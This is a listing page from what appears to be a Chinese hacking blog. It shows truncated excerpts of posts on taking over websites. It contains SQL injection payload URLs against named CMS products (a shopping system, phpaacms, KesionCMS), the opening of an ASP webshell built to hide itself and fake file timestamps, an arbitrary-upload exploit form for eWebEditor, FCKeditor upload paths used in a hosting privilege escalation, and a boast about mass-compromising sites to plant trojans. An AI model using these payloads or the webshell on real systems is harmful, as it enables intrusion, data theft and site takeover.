网趣网上购物系统时尚版 V最新漏洞拿WEBSHELL

西宁威势 今天周末,睡到中午才起床,刚上线,看到QQ好友辐射鱼给我留言,找我测试脚本漏洞。 辐射鱼 13:01:03 等我找个点. 辐射鱼 13:03:48 https://www.webshell.cc/price.asp?anid=62%20and%20exists%20(select%20*%20from%20cnhww) 辐射鱼 13:04:41 表cnhww.为啥不支持 order by ...

- 阅读全文 -

隐藏并修改文件的最后修改时间的asp-webshell

作者:skyfire[B.H.S.T] 隐藏并修改文件的最后修改时间的asp-webshell。 源码: <% '隐藏并修改文件的最后修改时间的aspshell '原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等;FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件 ' 通过shell.application可以给文件重新设置一个最后修改时间 '200...

- 阅读全文 -

ewebeditor PHP 3.8版本上传任意文件0day

PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似 听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。 EXP如下: <title>eWebeditoR3.8 for php任意文件上EXP</title> <form action="" method=post enctype="multipart/form-data"> &l...

- 阅读全文 -

一次星外虚拟主机的提权

今天看到个大马多功能防asp木马查杀内部测试版(有后门)看了下.换客网 www.taoyuanbao.com 小小检测了下绝对没啥可利用的。直接旁注几分钟拿下了个shell貌似运气好,随便打开个旁站。 手工输入 fckeditor路径 …。存在… FCKeditor/editor/filemanager/connectors/test.html FCKeditor/editor/filemanag...

- 阅读全文 -

114啦网址导航留言本注入

漏洞文件feedback/feedback.php   影响版本 <=1.5   $username = empty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username'])); $email = (isset($_POST['email'])) ? strip_tags...

- 阅读全文 -

phpaacms 4.0 Sql 注入0day漏洞及修复

phpaacms是一套免费开源的简洁文章管理系统cms. 漏洞文件:search.php //变量$_GET['id']过滤不严造成的注射 测试EXP: https://www.webshell.cc/phpaacms/search.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELEC...

- 阅读全文 -

科汛CMS 6.X-7.06最新注入0day

kesionCMS用的人非常多哦。经常也被暴洞。记得几年前藏着一个科汛的HTTP头注入的 0day日了好多站,那时候多喜欢挂驴。搞了好多黄色图片站来挂。 这次暴的洞是T00LS的核心先发的。然后论坛一个社工牛给社了后研究出来的。 直接暴管理员帐号和密码的EXP: https://www.webshell.cc/user/reg/regajax.asp?action=getcityoption&am...

- 阅读全文 -